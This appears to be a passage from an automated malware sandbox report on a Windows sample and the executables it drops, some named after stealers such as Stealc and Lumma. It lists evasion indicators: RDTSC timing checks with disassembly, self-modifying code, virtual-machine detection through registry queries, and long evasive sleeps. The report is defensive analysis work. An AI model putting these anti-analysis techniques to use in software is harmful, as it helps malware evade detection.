Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB047C second address: 4AB0482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA0843 second address: 4AA08A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D69Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F4B9132D6A2h 0x0000000f sub cl, FFFFFFD8h 0x00000012 jmp 00007F4B9132D69Bh 0x00000017 popfd 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b jmp 00007F4B9132D6A6h 0x00000020 and esp, FFFFFFF8h 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F4B9132D69Ah 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA08A1 second address: 4AA08A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA08A5 second address: 4AA08AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA08AB second address: 4AA08B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA08B1 second address: 4AA08B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA08B5 second address: 4AA08DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6238h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov cx, F4E3h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA08DB second address: 4AA0917 instructions: 0x00000000 rdtsc 0x00000002 mov ax, FC3Fh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007F4B9132D6A4h 0x0000000d mov bx, si 0x00000010 pop ecx 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F4B9132D6A6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA0917 second address: 4AA091D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA091D second address: 4AA095E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, di 0x00000006 pushfd 0x00000007 jmp 00007F4B9132D6A9h 0x0000000c add ecx, 1940E2A6h 0x00000012 jmp 00007F4B9132D6A1h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA095E second address: 4AA0985 instructions: 0x00000000 rdtsc 0x00000002 mov dl, cl 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov edi, 32E0E848h 0x0000000b popad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4B90BE6236h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA0985 second address: 4AA0989 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA0989 second address: 4AA098F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA098F second address: 4AA09A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4B9132D69Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA09A0 second address: 4AA09A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA09A4 second address: 4AA0A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b jmp 00007F4B9132D69Dh 0x00000010 mov esi, dword ptr [ebp+08h] 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F4B9132D69Ch 0x0000001a adc ax, D838h 0x0000001f jmp 00007F4B9132D69Bh 0x00000024 popfd 0x00000025 call 00007F4B9132D6A8h 0x0000002a mov ecx, 05F42AF1h 0x0000002f pop eax 0x00000030 popad 0x00000031 mov ebx, 00000000h 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA0A08 second address: 4AA0A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA0A0C second address: 4AA0A12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA0A12 second address: 4AA0A78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, eax 0x00000005 pushfd 0x00000006 jmp 00007F4B90BE6238h 0x0000000b add ax, 1428h 0x00000010 jmp 00007F4B90BE622Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 test esi, esi 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F4B90BE622Bh 0x00000024 add ch, 0000006Eh 0x00000027 jmp 00007F4B90BE6239h 0x0000002c popfd 0x0000002d mov eax, 6B2EDEF7h 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA0A78 second address: 4AA0AD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D69Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F4C04012F9Bh 0x0000000f pushad 0x00000010 mov bx, si 0x00000013 mov cx, F8DFh 0x00000017 popad 0x00000018 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001f pushad 0x00000020 mov ecx, 3D9724D7h 0x00000025 pushad 0x00000026 call 00007F4B9132D69Ah 0x0000002b pop eax 0x0000002c mov di, B706h 0x00000030 popad 0x00000031 popad 0x00000032 mov ecx, esi 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F4B9132D6A8h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA0AD3 second address: 4AA0B13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE622Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F4C038CBAE7h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F4B90BE6234h 0x00000016 and si, 7008h 0x0000001b jmp 00007F4B90BE622Bh 0x00000020 popfd 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: E0EA47 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: E0EB15 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: FB83B6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: E0EA41 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: E1EA47 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: E1EB15 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: FC83B6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: E1EA41 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Special instruction interceptor: First address: 461BBB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Special instruction interceptor: First address: 461BEF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Special instruction interceptor: First address: 605912 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Special instruction interceptor: First address: 68E8FC instructions caused by: Self-modifying code
Source: C:\Users\user\1000015002\b74664dd7e.exe Special instruction interceptor: First address: 7A1BBB instructions caused by: Self-modifying code
Source: C:\Users\user\1000015002\b74664dd7e.exe Special instruction interceptor: First address: 7A1BEF instructions caused by: Self-modifying code
Source: C:\Users\user\1000015002\b74664dd7e.exe Special instruction interceptor: First address: 945912 instructions caused by: Self-modifying code
Source: C:\Users\user\1000015002\b74664dd7e.exe Special instruction interceptor: First address: 9CE8FC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Special instruction interceptor: First address: 14E9BE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Special instruction interceptor: First address: 30EBAA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Special instruction interceptor: First address: 2F0FAB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Special instruction interceptor: First address: 373F69 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 75E9BE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 91EBAA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 900FAB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 983F69 instructions caused by: Self-modifying code
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Memory allocated: C30000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Memory allocated: 2770000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Memory allocated: 26A0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 1400000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 3010000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 2E40000 memory reserve | memory write watch
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_04B20892 rdtsc 6_2_04B20892
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 4229 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 4245 Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Window / User API: threadDelayed 8501 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Window / User API: threadDelayed 5856 Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Window / User API: threadDelayed 1181 Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Window / User API: threadDelayed 1165 Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Window / User API: threadDelayed 1156 Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Window / User API: threadDelayed 392 Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Window / User API: threadDelayed 1141 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1111
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1104
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1116
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 383
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1098
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1139
Source: C:\Users\user\1000015002\b74664dd7e.exe Window / User API: threadDelayed 1205
Source: C:\Users\user\1000015002\b74664dd7e.exe Window / User API: threadDelayed 1075
Source: C:\Users\user\1000015002\b74664dd7e.exe Window / User API: threadDelayed 1081
Source: C:\Users\user\1000015002\b74664dd7e.exe Window / User API: threadDelayed 398
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 3631
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\66ed86be077bb_12[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\penis[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000321001\2.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\splwow64[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\needmoney[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\newbundle2[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\2[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\Blenar[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000340001\Blenar.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\2[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000285001\2.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\LummaC222222[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\crypted[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\acentric[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000318001\66ed86be077bb_12.exe Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe API coverage: 2.9 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7436 Thread sleep count: 43 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7436 Thread sleep time: -86043s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7412 Thread sleep count: 138 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7412 Thread sleep time: -276138s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7396 Thread sleep count: 272 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7396 Thread sleep time: -8160000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7512 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7424 Thread sleep count: 141 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7424 Thread sleep time: -282141s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7432 Thread sleep count: 130 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7432 Thread sleep time: -260130s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7408 Thread sleep count: 4229 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7408 Thread sleep time: -8462229s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7416 Thread sleep count: 4245 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7416 Thread sleep time: -8494245s >= -30000s Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 7852 Thread sleep count: 118 > 30 Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 7852 Thread sleep time: -236118s >= -30000s Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 7876 Thread sleep count: 120 > 30 Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 7876 Thread sleep time: -240120s >= -30000s Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 7848 Thread sleep count: 8501 > 30 Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 7848 Thread sleep time: -17010501s >= -30000s Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 7816 Thread sleep count: 297 > 30 Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 7816 Thread sleep time: -1782000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 8076 Thread sleep count: 45 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 8076 Thread sleep time: -90045s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 8080 Thread sleep count: 47 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 8080 Thread sleep time: -94047s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 8060 Thread sleep count: 45 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 8060 Thread sleep time: -90045s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 8036 Thread sleep count: 337 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 8036 Thread sleep time: -2022000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 8084 Thread sleep count: 36 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 8084 Thread sleep time: -72036s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 8064 Thread sleep count: 43 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 8064 Thread sleep time: -86043s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 8072 Thread sleep count: 49 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 8072 Thread sleep time: -98049s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe TID: 1512 Thread sleep time: -58750s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe TID: 1512 Thread sleep time: -58560s >= -30000s Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 4456 Thread sleep count: 1181 > 30 Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 4456 Thread sleep time: -2363181s >= -30000s Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 5256 Thread sleep count: 1165 > 30 Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 5256 Thread sleep time: -2331165s >= -30000s Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 6776 Thread sleep count: 1156 > 30 Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 6776 Thread sleep time: -2313156s >= -30000s Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 3076 Thread sleep count: 392 > 30 Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 3076 Thread sleep time: -2352000s >= -30000s Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 2460 Thread sleep count: 1141 > 30 Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 2460 Thread sleep time: -2283141s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 2332 Thread sleep time: -34017s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 2044 Thread sleep count: 33 > 30
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 2044 Thread sleep time: -198000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 5332 Thread sleep time: -32016s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 484 Thread sleep count: 1111 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 484 Thread sleep time: -2223111s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6432 Thread sleep count: 1104 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6432 Thread sleep time: -2209104s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6016 Thread sleep count: 1116 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6016 Thread sleep time: -2233116s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7312 Thread sleep count: 383 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7312 Thread sleep time: -11490000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 760 Thread sleep count: 1098 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 760 Thread sleep time: -2197098s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6012 Thread sleep count: 1139 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6012 Thread sleep time: -2279139s >= -30000s
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 712 Thread sleep count: 1205 > 30
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 712 Thread sleep time: -2411205s >= -30000s
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 1104 Thread sleep count: 1075 > 30
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 1104 Thread sleep time: -2151075s >= -30000s
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 7036 Thread sleep count: 1081 > 30
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 7036 Thread sleep time: -2163081s >= -30000s
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 6540 Thread sleep count: 398 > 30
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 6540 Thread sleep time: -2388000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe TID: 2856 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5932 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6336 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4128 Thread sleep time: -922337203685477s >= -30000s
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
